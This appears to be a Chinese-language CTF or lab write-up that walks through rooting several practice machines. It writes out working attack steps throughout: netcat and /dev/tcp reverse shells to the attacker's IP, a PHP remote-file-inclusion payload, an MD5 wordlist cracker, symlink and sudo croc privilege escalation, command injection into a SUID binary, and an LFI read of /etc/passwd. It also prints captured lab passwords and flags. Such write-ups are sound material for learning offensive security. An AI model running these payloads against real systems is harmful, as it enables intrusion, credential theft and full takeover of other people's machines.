With no FILE, or when FILE is -, read standard input.
\u200b
  -b, --binary         read in binary mode
  -c, --check          read MD5 sums from the FILEs and check them
      --tag            create a BSD-style checksum
  -t, --text           read in text mode (default)
  -z, --zero           end each output line with NUL, not newline,
                       and disable file name escaping
\u200b
The following five options are useful only when verifying checksums:
      --ignore-missing  don't fail or report status for missing files
      --quiet          don't print OK for each successfully verified file
      --status         don't output anything, status code shows success
      --strict         exit non-zero for improperly formatted checksum lines
  -w, --warn           warn about improperly formatted checksum lines
\u200b
      --help     display this help and exit
      --version  output version information and exit
\u200b
The sums are computed as described in RFC 1321.  When checking, the input
should be a former output of this program.  The default mode is to print a
line with checksum, a space, a character indicating input mode ('*' for binary,
' ' for text or where binary is insignificant), and name for each FILE.
\u200b
GNU coreutils online help: <https:\/\/www.gnu.org\/software\/coreutils\/>
Full documentation at: <https:\/\/www.gnu.org\/software\/coreutils\/md5sum>
or available locally via: info '(coreutils) md5sum invocation'<\/pre>\n\n\n\n
md5sum \u662f\u53ef\u4ee5\u8ba1\u7b97\u5b57\u7b26\u4e32\/\u6587\u4ef6\u7684md5\u503c<\/p>\n\n\n\n
\u67e5\u770b\u6587\u4ef6\u662f13k\u7684<\/p>\n\n\n\n
-rw-------  1 user10 user10   13 Nov 16 08:35 password.txt<\/pre>\n\n\n\n
\u770b\u4e00\u4e0b\u4ed6\u7684\u4e00\u4e9b\u5176\u4ed6\u4e1c\u897f<\/p>\n\n\n\n
user9@SudoHome:~$ echo '1' > 1.txt
user9@SudoHome:~$ ls -al
total 32
drwxr-xr-x  3 user9 user9 4096 Nov 24 07:27 .
drwxr-xr-x 12 root  root  4096 Nov 16 08:35 ..
-rw-r--r--  1 user9 user9    2 Nov 24 07:27 1.txt
-rw-r--r--  1 user9 user9  220 Apr 18  2019 .bash_logout
-rw-r--r--  1 user9 user9 3526 Apr 18  2019 .bashrc
drwxr-xr-x  3 user9 user9 4096 Nov 24 07:20 .config
-rw-------  1 user9 user9   21 Nov 16 08:35 password.txt
-rw-r--r--  1 user9 user9  807 Apr 18  2019 .profile
user9@SudoHome:~$ cat 1.txt
1
user9@SudoHome:~$ echo '11' > 11.txt
user9@SudoHome:~$ ls -al
total 36
drwxr-xr-x  3 user9 user9 4096 Nov 24 07:28 .
drwxr-xr-x 12 root  root  4096 Nov 16 08:35 ..
-rw-r--r--  1 user9 user9    3 Nov 24 07:28 11.txt
-rw-r--r--  1 user9 user9    2 Nov 24 07:27 1.txt<\/pre>\n\n\n\n
\u53d1\u73b0\u662f\u81ea\u52a8\u52a0\u4e00\u4e2a\u5b57\u7b26\uff0c\u5e94\u8be5\u662f\u52a0\u4e86\u6362\u884c\u7b26<\/p>\n\n\n\n
\u5982\u679c echo \u91cd\u5b9a\u5411\u65f6 \u4f7f\u7528 -n \u53c2\u6570 \u5c31\u4e0d\u4f1a\u591a\u51fa\u6362\u884c\u7b26<\/p>\n\n\n\n
\u90a3suer10\u7684password\u5e94\u8be5\u662f12\u5b57\u8282\u52a0\u4e00\u4e2a\u6362\u884c\u7b26<\/p>\n\n\n\n
user9@SudoHome:~$ sudo -u user10 md5sum ..\/user10\/password.txt
65e31d336be184593812c18533fa4fa2  ..\/user10\/password.txt
\u67e5\u770b\u4ed6\u7684md5\u54c8\u5e0c\u503c<\/pre>\n\n\n\n
<?php
$targetHash = '65e31d336be184593812c18533fa4fa2';
$start_time = microtime(true);
$file = '\/usr\/share\/wordlists\/rockyou.txt';
$handle = fopen($file, \"r\");
if ($handle) {
    while (($line = fgets($handle)) !== false) {
if (md5($line) === $targetHash) {
    $end_time = microtime(true);
    $elapsed_time = $end_time - $start_time;
    echo \"Found: \" . $line;
    echo \"Time elapsed: \" . round($elapsed_time, 4) . \" seconds\\n\";
    fclose($handle);
    exit;
}
}
    fclose($handle);
    $end_time = microtime(true);
    $elapsed_time = $end_time - $start_time;
    echo \"Not found.\\n\";
    echo \"Search completed in: \" . round($elapsed_time, 4) . \" seconds\\n\";
}
?><\/pre>\n\n\n\n
\u811a\u672c\u76f4\u63a5\u7206\u7834<\/p>\n\n\n\n
php try123.php
Found: morrinsville
Time elapsed: 0.0666 seconds<\/pre>\n\n\n\n
root<\/h3>\n\n\n\n
user10@SudoHome:~$ sudo -l
Matching Defaults entries for user10 on SudoHome:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin
\u200b
User user10 may run the following commands on SudoHome:
    (ALL) NOPASSWD: \/usr\/bin\/cat \/home\/user10\/.important<\/pre>\n\n\n\n
\u5229\u7528\u77ed\u94fe\u63a5\u5c06\/root\/user.txt\u548c\/root\/root.txt\u4f9d\u6b21\u5199\u5165.important\u6587\u4ef6\u5e76\u8bfb\u53d6\u5220\u9664<\/p>\n\n\n\n
user10@SudoHome:~$ rm -f .important
user10@SudoHome:~$ ln -s \/root\/root.txt .important
user10@SudoHome:~$ sudo \/usr\/bin\/cat \/home\/user10\/.important
flag{root-f522d1d715970073a6413474ca0e0f63}<\/pre>\n\n\n\n
gameshell<\/h2>\n\n\n\n
\u4e2d\u95f4\u6253\u4e86\u597d\u51e0\u6b21\uff0c\u90fd\u6ca1\u6253\u8fdb\u53bb\ud83e\udd21<\/p>\n\n\n\n
nmap 192.168.3.74
22 80 7681 \u7aef\u53e3
\u8fdb\u53bb7681\u53d1\u73b0\u662f\u4e00\u4e2a\u4ea4\u4e92\u5f0fshell\uff0c\u662f\u4e00\u4e2a\u5c0f\u6e38\u620f \u4e0d\u7ba1\u4e86\uff0c\u4e0d\u60f3\u6253\uff0c\u76f4\u63a5\u53cd\u5f39shell\u770b\u672c\u5730\u53bb<\/pre>\n\n\n\n
busybox nc 192.168.3.219 4444 -e \/bin\/bash<\/pre>\n\n\n\n
nc -lvvp 4444<\/pre>\n\n\n\n
\u8dd1\u2f00\u904dlinpeas<\/p>\n\n\n\n
curl -L https:\/\/github.com\/carlospolop\/PEASS-ng\/releases\/latest\/download\/linpeas.sh | bash<\/pre>\n\n\n\n
\u53d1\u73b0\u6709\u8d26\u53f7\u663e\u793a\u51fa\u6765<\/p>\n\n\n\n
admin:nimda<\/pre>\n\n\n\n
\u672c\u5730\u8f6c\u53d1\u4e00\u4e0b ssh -N -R 127.0.0.1:8888:127.0.0.1:9876 kali@192.168.3.219
[mission 1] $ ssh -N -R 127.0.0.1:9999:127.0.0.1:9876 wea5e1@192.168.3.219
ssh -N -R 127.0.0.1:9999:127.0.0.1:9876 wea5e1@192.168.3.219
The authenticity of host '192.168.3.219 (192.168.3.219)' can't be established.
ECDSA key fingerprint is SHA256:nUWirmUT31d7OjVHs33wBQ0lYTiXqg5uVTRfSEYj64E.
Are you sure you want to continue connecting (yes\/no\/[fingerprint])? yes
yes
Could not create directory '\/var\/www\/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (\/var\/www\/.ssh\/known_hosts).
wea5e1@192.168.3.219's password:<\/pre>\n\n\n\n
\u53d1\u73b0\u9700\u8981\u8d26\u53f7\u548c\u5bc6\u7801\uff0c\u4f7f\u7528\u4e0a\u9762\u7684\u53bb\u767b\u5f55<\/p>\n\n\n\n
eviden@GameShell:\/$ ls
bin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
eviden@GameShell:\/$ busybox nc 192.168.3.219 443 -e \/bin\/bash<\/pre>\n\n\n\n
\u518d\u6b21\u53cd\u5f39shell<\/p>\n\n\n\n
\/usr\/bin\/script -qc \/bin\/bash \/dev\/null
eviden@GameShell:\/$ id
id
uid=1001(eviden) gid=1001(eviden) groups=1001(eviden)
eviden@GameShell:\/$ sudo -l
sudo -l
Matching Defaults entries for eviden on GameShell:
    env_reset, mail_badpass,
    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin

User eviden may run the following commands on GameShell:
    (ALL) NOPASSWD: \/usr\/local\/bin\/croc<\/pre>\n\n\n\n
croc\u53ef\u4ee5\u53bb\u641c\u4e00\u4e0b\u662f\u4f20\u8f93\u2f42\u4ef6\u7684\u2f2f\u5177 \u5e76\u4e14\u53ef\u5199 \u90a3\u5c31\u4f20\u4e2a\u516c\u94a5\u5427\uff0c\u5e76\u4e14\u662fsudo\u7684\u6743\u9650<\/p>\n\n\n\n
kali:
cat ~\/.ssh\/id_ed25519.pub > authorized_keys
croc --ip 192.168.3.219 send authorized_keys
croc --ip 192.168.3.74 send authorized_keys
Sending 'authorized_keys' (95 B) 
Code is: 7312-bridge-africa-brenda

On the other computer run:
(For Windows)
    croc 7312-bridge-africa-brenda
(For Linux\/macOS)
    CROC_SECRET=\"7312-bridge-africa-brenda\" croc 

Sending (->192.168.3.74:42810)
authorized_keys 100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| (95\/95 B, 219 kB\/s)<\/pre>\n\n\n\n
eviden@GameShell:
eviden@GameShell:\/$ sudo croc --yes --out \/root\/.ssh
sudo croc --yes --out \/root\/.ssh
Enter receive code: 7312-bridge-africa-brenda
Enter receive code: 7312-bridge-africa-brenda
Receiving 'authorized_keys' (95 B) 

Receiving (<-192.168.3.219:9009)

Overwrite 'authorized_keys'? (y\/N) (use --overwrite to omit) y
y
 authorized_keys 100% |\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| (95\/95 B, 32 kB\/s)<\/pre>\n\n\n\n
\u2500# ssh root@192.168.3.74 -i ~\/.ssh\/id_ed25519
The authenticity of host '192.168.3.74 (192.168.3.74)' can't be established.
ED25519 key fingerprint is SHA256:O2iH79i8PgOwV\/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ.
This host key is known by the following other names\/addresses:
    ~\/.ssh\/known_hosts:4: [hashed name]
    ~\/.ssh\/known_hosts:10: [hashed name]
Are you sure you want to continue connecting (yes\/no\/[fingerprint])? yes
Warning: Permanently added '192.168.3.74' (ED25519) to the list of known hosts.
Linux GameShell 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU\/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in \/usr\/share\/doc\/*\/copyright.

Debian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@GameShell:~# id
uid=0(root) gid=0(root) groups=0(root)
root@GameShell:~# \u62ff\u4e0broot<\/pre>\n\n\n\n
word<\/h2>\n\n\n\n
user<\/h3>\n\n\n\n
\u6253\u5f00\u7f51\u7ad9\u626b\u63cf\u7aef\u53e3\uff0c\u4f9d\u7136\u662f80\u548c22<\/p>\n\n\n\n
\u7136\u540e\u8bbf\u95ee80\u7aef\u53e3\uff0c\u626b\u63cf\u51fa\u6765banner.php\u548cwordpress\uff0c\u8bbf\u95eebanner.php\u53d1\u73b0\u662f\u4e00\u4e2a\uff0c\u4e0d\u7ed9\u4e2d\u95f4\u8bbf\u95ee\u4f1a\u53d1\u73b0\u5361\uff0c\u6211\u5f53\u65f6\u6253user\u662f\u76f4\u63a5\u501f\u7528\u6253htb\u7684\u65b9\u6cd5\uff0c\u5728\/etc\/hosts\u91cc\u9762\u6dfb\u52a0<\/p>\n\n\n\n
10.247.102.175  word.dsz<\/pre>\n\n\n\n
\u4f7f\u7528dirsearch\u548cgobuster dir \u548cwpscan\u626b\u51fa\u6765http:\/\/word.dsz\/wordpress\/wp-content\/uploads<\/pre>\n\n\n\n
\u53d1\u73b0\u662f\u4e00\u4e2a\u6587\u4ef6\u76ee\u5f55\uff0c\u5728\u91cc\u9762\u5b58\u5728pass.txt,\u7136\u540e\u4f7f\u7528<\/p>\n\n\n\n
wpscan --url http:\/\/10.247.102.175\/wordpress --enumerate u<\/pre>\n\n\n\n
\u53d1\u73b0\u5b58\u5728root\u7528\u6237\uff0c\u5e76\u4e14\u5728\u524d\u9762\u626b\u63cf\u51fa\u6765\u4ed6\u7684\u540e\u53f0<\/p>\n\n\n\n
root\/S9ZF6mtLdHfmr8PmCq3i(\u597d\u5427\uff0c\u867d\u7136\u6211\u5c1d\u8bd5\u76f4\u63a5ssh\u767b\u5f55\uff0c\u4e00\u76f4\u5361\u90a3\uff0c\u5e76\u4e14\u8fd8\u53bb\u95ee\u4e86\u52aa\u529b\u54e5\ud83e\udd21)<\/pre>\n\n\n\n
\u767b\u5f55\u6210\u529f\uff0c\u4e4b\u540e\u501f\u7528babycms\u7684\u601d\u8def\uff0c\u5728\u4ed6\u7684\u4e3b\u9898\u7f16\u8bd1\u5668\u91cc\u9762\u627ephp\u6587\u4ef6\u53bb\u53cd\u5f39shell\uff0c\u6211\u8fd9\u91cc\u662f\u7528\u7684patterns\/banner-about-book.php \u6587\u4ef6<\/p>\n\n\n\n
\u4e4b\u540e\u8bbf\u95eehttp:\/\/word.dsz\/wordpress\/wp-content\/themes\/twentytwentyfive\/patterns\/banner-about-book.php<\/pre>\n\n\n\n
nc -lvvp 4444              
listening on [any] 4444 ...
connect to [10.247.102.219] from word.dsz [10.247.102.175] 39364
bash: cannot set terminal process group (474): Inappropriate ioctl for device
bash: no job control in this shell
<press\/wp-content\/themes\/twentytwentyfive\/patterns$ \/usr\/bin\/script -qc \/bin\/bash \/dev\/null
<e\/patterns$ \/usr\/bin\/script -qc \/bin\/bash \/dev\/null
<press\/wp-content\/themes\/twentytwentyfive\/patterns$ cd \/
cd \/
www-data@Word:\/$ \/usr\/bin\/script -qc \/bin\/bash \/dev\/null
\/usr\/bin\/script -qc \/bin\/bash \/dev\/null
www-data@Word:\/$ dpkg -V 2>\/dev\/null
dpkg -V 2>\/dev\/null
??5?????? c \/etc\/irssi.conf
??5?????? c \/etc\/apache2\/apache2.conf
??5??????   \/var\/lib\/polkit-1\/localauthority\/10-vendor.d\/systemd-networkd.pkla
??5??????   \/usr\/lib\/mysql\/plugin\/auth_pam_tool_dir\/auth_pam_tool
??5?????? c \/etc\/grub.d\/10_linux
??5?????? c \/etc\/grub.d\/40_custom
??5?????? c \/etc\/sudoers
??5?????? c \/etc\/sudoers.d\/README
??5?????? c \/etc\/inspircd\/inspircd.conf
??5?????? c \/etc\/inspircd\/inspircd.motd
??5?????? c \/etc\/inspircd\/inspircd.rules
??5??????   \/usr\/bin\/top
??5??????   \/var\/lib\/polkit-1\/localauthority\/10-vendor.d\/org.freedesktop.packagekit.pkla
??5?????? c \/etc\/issue
www-data@Word:\/$ cat \/usr\/bin\/top
cat \/usr\/bin\/top
#!\/bin\/bash

echo 'jUOhu37yYllYiVxQNw8G'
systemctl restart ssh<\/pre>\n\n\n\n
\u53cd\u5f39\u6210\u529f\u62ff\u4e0buser<\/pre>\n\n\n\n
root<\/h3>\n\n\n\n
\u5728\u4e0a\u9762\u6253\u51fa\u4e86dpkg -V 2>\/dev\/null\u547d\u4ee4\uff0c
www-data@Word:\/$ cat \/usr\/bin\/top
cat \/usr\/bin\/top
#!\/bin\/bash

echo 'jUOhu37yYllYiVxQNw8G'
systemctl restart ssh<\/pre>\n\n\n\n
cat banner.php
cat b*
<?php
\/\/ \u8bbe\u7f6e\u9875\u9762\u6807\u9898\u548c\u5b57\u7b26\u7f16\u7801
$page_title = \"\u5b9a\u5236\u4f60\u7684SSH\u6b22\u8fce\u754c\u9762\";
$saved_message = \"\";

\/\/ \u5904\u7406\u8868\u5355\u63d0\u4ea4
if ($_SERVER[\"REQUEST_METHOD\"] == \"POST\" && isset($_POST['banner_text'])) {
    $banner_text = $_POST['banner_text'];
    $file_path = '\/home\/ssh-banner\/banner.txt';
    
    \/\/ \u786e\u4fdd\u76ee\u5f55\u5b58\u5728
    $dir = dirname($file_path);
    if (!is_dir($dir)) {
        mkdir($dir, 0755, true);
    }
    
    \/\/ \u5c1d\u8bd5\u4fdd\u5b58\u6587\u4ef6
    if (file_put_contents($file_path, $banner_text) !== false) {
        $saved_message = \"Banner Saved.  try ssh \";
    } else {
        $saved_message = \"Banner Saved failed.\";
    }
}

\/\/ \u5c1d\u8bd5\u8bfb\u53d6\u73b0\u6709\u5185\u5bb9
$current_content = \"\";
$file_path = '\/home\/ssh-banner\/banner.txt';
if (file_exists($file_path)) {
    $current_content = htmlspecialchars(file_get_contents($file_path));
}
?>
<!DOCTYPE html>
<html lang=\"zh-CN\">
<head>
    <meta charset=\"UTF-8\">
    <title><?php echo $page_title; ?><\/title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            max-width: 800px;
            margin: 0 auto;
            padding: 20px;
            background-color: #f5f5f5;
            color: #333;
        }
        .container {
            background-color: white;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
            padding: 30px;
            margin-top: 20px;
        }
        h1 {
            color: #2c3e50;
            border-bottom: 2px solid #3498db;
            padding-bottom: 10px;
        }
        .form-group {
            margin-bottom: 20px;
        }
        label {
            display: block;
            margin-bottom: 8px;
            font-weight: bold;
        }
        textarea {
            width: 100%;
            height: 200px;
            padding: 10px;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-family: monospace;
            resize: vertical;
        }
        .btn {
            background-color: #3498db;
            color: white;
            border: none;
            padding: 10px 20px;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
        }
        .btn:hover {
            background-color: #2980b9;
        }
        .message {
            padding: 10px;
            margin: 15px 0;
            border-radius: 4px;
            text-align: center;
        }
        .success {
            background-color: #d4edda;
            color: #155724;
            border: 1px solid #c3e6cb;
        }
        .error {
            background-color: #f8d7da;
            color: #721c24;
            border: 1px solid #f5c6cb;
        }
        .preview {
            background-color: #2c3e50;
            color: #ecf0f1;
            border-radius: 4px;
            padding: 15px;
            margin-top: 20px;
            font-family: monospace;
            white-space: pre-wrap;
        }
        .preview-title {
            font-weight: bold;
            margin-bottom: 10px;
            color: #3498db;
        }
    <\/style>
<\/head>
<body>
    <div class=\"container\">
        <h1><?php echo $page_title; ?><\/h1>
        
        <?php if (!empty($saved_message)): ?>
            <div class=\"message <?php echo strpos($saved_message, '\u9519\u8bef') !== false ? 'error' : 'success'; ?>\">
                <?php echo $saved_message; ?>
            <\/div>
        <?php endif; ?>
        
        <form method=\"POST\" action=\"\">
            <div class=\"form-group\">
                <label for=\"banner_text\">SSH\u6b22\u8fce\u4fe1\u606f\u5185\u5bb9\uff1a<\/label>
                <textarea id=\"banner_text\" name=\"banner_text\" placeholder=\"\u5728\u6b64\u8f93\u5165SSH\u767b\u5f55\u65f6\u663e\u793a\u7684\u6b22\u8fce\u4fe1\u606f...\"><?php echo $current_content; ?><\/textarea>
            <\/div>
            
            <button type=\"submit\" class=\"btn\">\u4fdd\u5b58Banner<\/button>
        <\/form>
        
        <?php if (!empty($current_content)): ?>
        <div class=\"preview\">
            <div class=\"preview-title\">\u9884\u89c8\u6548\u679c\uff1a<\/div>
            <?php echo nl2br($current_content); ?>
        <\/div>
        <?php endif; ?>
    <\/div>
<\/body>
<\/html><\/pre>\n\n\n\n
\u76f4\u63a5\u53bb\u95eeai:<\/p>\n\n\n\n
\u8fd9\u662f\u4e00\u4e2aSSH \u6b22\u8fce\u4fe1\u606f\u5b9a\u5236\u9875\u9762<\/strong>\uff0c\u6838\u5fc3\u529f\u80fd\u662f\u5c06\u7528\u6237\u8f93\u5165\u7684\u5185\u5bb9\u5199\u5165 \/home\/ssh-banner\/banner.txt<\/code> \u6587\u4ef6 \u2014\u2014 \u8fd9\u4e2a\u573a\u666f\u4e0b\u85cf\u7740\u4e00\u4e2a\u5173\u952e\u63d0\u6743\u7a81\u7834\u53e3\uff1a\u5229\u7528 SSH Banner \u6587\u4ef6\u7684\u52a0\u8f7d\u673a\u5236\uff0c\u8ba9\u9776\u673a\u81ea\u52a8\u6267\u884c\u6211\u4eec\u690d\u5165\u7684\u547d\u4ee4<\/strong>\uff0c\u6700\u7ec8\u83b7\u53d6\u9ad8\u6743\u9650\u7528\u6237\uff08\u751a\u81f3 root\uff09\u7684 shell\u3002<\/p>\n\n\n\n
\u5e76\u4e14\u901a\u8fc7\u4e0a\u9762\u7684jUOhu37yYllYiVxQNw8G \u76f4\u63a5ssh\u767b\u5f55ssh-banner\u53d1\u73b0\u767b\u5f55\u6210\u529f<\/p>\n\n\n\n
ssh-banner@Word:~$ ls -al
total 28
drwxr-xr-x 2 ssh-banner ssh-banner 4096 Nov 15 03:51 .
drwxr-xr-x 3 root       root       4096 Nov 14 21:59 ..
-rwxrwxrwx 1 root       root         47 Nov 29 08:46 banner.txt
lrwxrwxrwx 1 root       root          9 Nov 15 03:51 .bash_history -> \/dev\/null                                                                           
-rw-r--r-- 1 ssh-banner ssh-banner  220 Nov 14 21:59 .bash_logout
-rw-r--r-- 1 ssh-banner ssh-banner 3526 Nov 14 21:59 .bashrc
-rw-r--r-- 1 ssh-banner ssh-banner  807 Nov 14 21:59 .profile
-rw-r--r-- 1 root       root         44 Nov 14 22:10 user.txt
ssh-banner@Word:~$ ln -sf \/root\/root.txt banner.txt\/\/<\/pre>\n\n\n\n
\u8ba9 banner.txt<\/code> \u6210\u4e3a \/root\/root.txt<\/code> \u7684 \u201c\u5feb\u6377\u65b9\u5f0f\u201d<\/p>\n\n\n\n
\u76f4\u63a5\u53bbssh\u8fde\u63a5<\/p>\n\n\n\n
ssh-banner@Word:~$ ssh ssh-banner@10.247.102.175
The authenticity of host '10.247.102.175 (10.247.102.175)' can't be established.
ECDSA key fingerprint is SHA256:IV6iZTL6D\/\/1Ojh0d8XoSMepPgjyUfV\/FpQmf3q35Hg.
Are you sure you want to continue connecting (yes\/no\/[fingerprint])? yes
Warning: Permanently added '10.247.102.175' (ECDSA) to the list of known hosts.
flag{root-a46ec67a0f2e7c387926ac5d783ea4b8}
ssh-banner@10.247.102.175's password: 
Connection closed by 10.247.102.175 port 22
\u62ff\u4e0broot.txt<\/pre>\n\n\n\n
open<\/h2>\n\n\n\n
user<\/h3>\n\n\n\n
\u6253\u770b\u7f51\u7ad9\uff0c\u540c\u6837\u7684\uff0c\u548c\u4e0a\u9762\u4e00\u6837\u52a0\u5165<\/p>\n\n\n\n
10.247.102.236 open.dsz  \u66f4\u52a0\u7a33\u5b9a\u4e00\u4e9b<\/pre>\n\n\n\n
\u7136\u540e\u53d1\u73b0\u662f\u4e00\u4e2a\u53ef\u4ee5\u8fdb\u884cssrf\u7684\u5730\u65b9\uff0c\u4e0d\u8fc7\u5fc5\u987b\u662fhttp:\/\/open<\/a>\u7684\u524d\u7f00\uff0c\u8fd9\u91cc\u501f\u7528hyh\u5927\u795e\u7684\u8bb2\u89e3<\/p>\n\n\n\n
https:\/\/username:password@subdomain.example.com:8080\/path\/to\/resource.html?
key1=value1&key2=value2#section2
\u5206\u89e3\uff1a
\u534f\u8bae\uff08scheme\uff09\uff1ahttps
\u7528\u6237\u540d\uff1ausername
\u5bc6\u7801\uff1apassword
\u4e3b\u673a\uff08\u57df\u540d\/IP\uff09\uff1asubdomain.example.com
\u7aef\u53e3\uff1a8080
\u8def\u5f84\uff1a\/path\/to\/resource.html
\u67e5\u8be2\u53c2\u6570\uff08query string\uff09\uff1a?key1=value1&key2=value2
\u7247\u6bb5\u6807\u8bc6\u7b26\uff08fragment\uff09\uff1a#section2
\u90a3\u4e48\u53ef\u4ee5\u8054\u60f3\u5230\uff0c\u5c06open\u4f5c\u4e3a\u7528\u6237\u540d\uff0c\u7136\u540eIP\u53ef\u4ee5\u81ea\u5df1\u63a7\u5236\u4ece\u800c\u7ed5\u8fc7\u3002\u8fd9\u91cc\u4f7f\u7528\u7684\u662f\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b<\/pre>\n\n\n\n
\u76f4\u63a5\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\uff0c\u5728kali\u91cc\u9762\u5199\u5165shell.php<\/p>\n\n\n\n
\u91cc\u9762\u662f<?php system(\"\/bin\/bash -c 'bash -i >& \/dev\/tcp\/10.247.102.219\/2332 0>&1'\")?><\/pre>\n\n\n\n
\u250c\u2500\u2500(root\u327fkali2025)-[\/home\/wea5e1]
\u2514\u2500# python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http:\/\/0.0.0.0:8080\/) ...
10.247.102.236 - - [01\/Dec\/2025 19:07:58] \"GET \/shell.php HTTP\/1.1\" 200 -<\/pre>\n\n\n\n
root<\/h3>\n\n\n\n
\u2514\u2500# nc -lvvp 2332
listening on [any] 2332 ...
connect to [10.247.102.219] from open.dsz [10.247.102.236] 57214
bash: cannot set terminal process group (418): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Open:\/var\/www\/open.dsz$ ls
\/usr\/bin\/script -qc \/bin\/bash \/dev\/null \/\/\u4f7fshell\u66f4\u52a0\u7a33\u5b9a<\/pre>\n\n\n\n
www-data@Open:\/home\/miao$ find \/ -perm -4000 -type f 2>\/dev\/null
find \/ -perm -4000 -type f 2>\/dev\/null
\/usr\/bin\/chsh
\/usr\/bin\/chfn
\/usr\/bin\/newgrp
\/usr\/bin\/gpasswd
\/usr\/bin\/mount
\/usr\/bin\/su
\/usr\/bin\/umount
\/usr\/bin\/pkexec
\/usr\/bin\/sudo
\/usr\/bin\/passwd
\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper
\/usr\/lib\/eject\/dmcrypt-get-device
\/usr\/lib\/openssh\/ssh-keysign
\/usr\/libexec\/polkit-agent-helper-1
\/opt\/echo<\/pre>\n\n\n\n
\u8fd9\u91cc\u770b\u5230\u4e00\u4e2aecho<\/p>\n\n\n\n
\/opt\/echo \"1\"   
\/opt\/echo \"1\"
\u6267\u884c\u547d\u4ee4: echo '[\u7528\u6237\u8f93\u5165]: 1'
[\u7528\u6237\u8f93\u5165]: 1
www-data@Open:\/home\/miao$ \/opt\/echo \"1'\"
\/opt\/echo \"1'\"
\u6267\u884c\u547d\u4ee4: echo '[\u7528\u6237\u8f93\u5165]: 1''
sh: 1: Syntax error: Unterminated quoted string
www-data@Open:\/home\/miao$ \/opt\/echo \"1';id\"
\/opt\/echo \"1';id\"
\u6267\u884c\u547d\u4ee4: echo '[\u7528\u6237\u8f93\u5165]: 1';id'
sh: 1: Syntax error: Unterminated quoted string
www-data@Open:\/home\/miao$ \/opt\/echo \"123';id'\"
\/opt\/echo \"123';id'\"
\u6267\u884c\u547d\u4ee4: echo '[\u7528\u6237\u8f93\u5165]: 123';id''
[\u7528\u6237\u8f93\u5165]: 123
uid=1000(miao) gid=1000(miao) groups=1000(miao),33(www-data) \u53d1\u73b0\u53ef\u4ee5\u4f7f\u7528'\u7ed5\u8fc7\u53bb\u6267\u884c\u547d\u4ee4<\/pre>\n\n\n\n
mao<\/h2>\n\n\n\n
user<\/h3>\n\n\n\n
\u4fe1\u606f\u641c\u96c6\u4e00\u4e0b<\/p>\n\n\n\n
nmap -sV -T4 10.247.102.83
Starting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-12-08 22:54 CST
Nmap scan report for 10.247.102.83
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22\/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
80\/tcp open  http    Apache httpd 2.4.62 ((Debian))<\/pre>\n\n\n\n
dir\u4e00\u4e0b
[22:56:24] 302 -    0B  - \/dashboard.php  ->  index.php                     
[22:56:27] 200 -   66B  - \/home.php                                         
[22:56:29] 302 -    0B  - \/logout.php  ->  index.php
[22:56:35] 200 -  198B  - \/settings.php                                     
[22:56:36] 200 -  323B  - \/stats.php                                        <\/pre>\n\n\n\n
\u53bb\u770b\u770b80\u7aef\u53e3\uff0c\u53d1\u73b0\u662f\u4e00\u4e2a\u767b\u5f55\u9875\u9762\uff0c\u53d1\u73b0\u4f7f\u7528admin\u662f\u5bc6\u7801\u9519\u8bef\uff0c\u90a3\u5c31\u53bb\u7206\u7834<\/p>\n\n\n\n
admin\/pinkgir1<\/pre>\n\n\n\n
\u767b\u5f55\u8fdb\u53bb\u968f\u4fbf\u70b9\u70b9\u770b\u770b
http:\/\/10.247.102.83\/dashboard.php?page=home.php
\uff1f\uff1f\uff1f
\u6587\u4ef6\u5305\u542b<\/pre>\n\n\n\n
http:\/\/10.247.102.83\/dashboard.php?page=\/etc\/passwd
root:x:0:0:root:\/root:\/bin\/bash daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin sync:x:4:65534:sync:\/bin:\/bin\/sync games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin irc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin 